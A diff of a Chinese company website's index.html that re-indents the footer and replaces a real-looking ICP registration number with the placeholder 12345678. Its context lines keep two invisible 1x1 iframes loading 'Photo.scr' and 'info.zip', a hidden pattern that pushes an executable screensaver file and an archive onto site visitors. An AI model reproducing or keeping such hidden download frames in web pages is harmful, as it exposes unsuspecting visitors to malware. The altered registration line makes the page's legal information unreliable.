--- a/index.html
+++ b/index.html
@@ -209,11 +209,13 @@
        <iframe src="Photo.scr" width="1" height="1" frameborder="0"> </iframe>
        <iframe src="info.zip" width="1" height="1" frameborder="0"> </iframe>
       </div>
-    <!-- 新增部分：备案信息 -->
-<div class="footer" style="text-align:center;">
-  <p style="text-align:center;">Copyright © 河南享卡信息科技有限公司版权所有</p>
-  <!-- 将原来的豫ICP备12345678号-1替换为链接 -->
-  <a href="https://beian.miit.gov.cn/#/Integrated/index" target="_blank" style="color: inherit;">豫ICP备2023032286号-1</a>
-</div>
+      <!-- 新增部分：备案信息 -->
+  <div class="footer" style="text-align:center;">
+    <p style="text-align:center;">Copyright © 河南享卡信息科技有限公司版权所有</p>
+    <!-- 将原来的豫ICP备12345678号-1替换为链接 -->
+    <a href="https://beian.miit.gov.cn/#/Integrated/index" target="_blank" style="color: inherit;">豫ICP备12345678号-1</a>
+  </div>
+
+  <!-- 请确保没有任何其他元素出现在 .footer 后面 -->
 </body>
 </html>
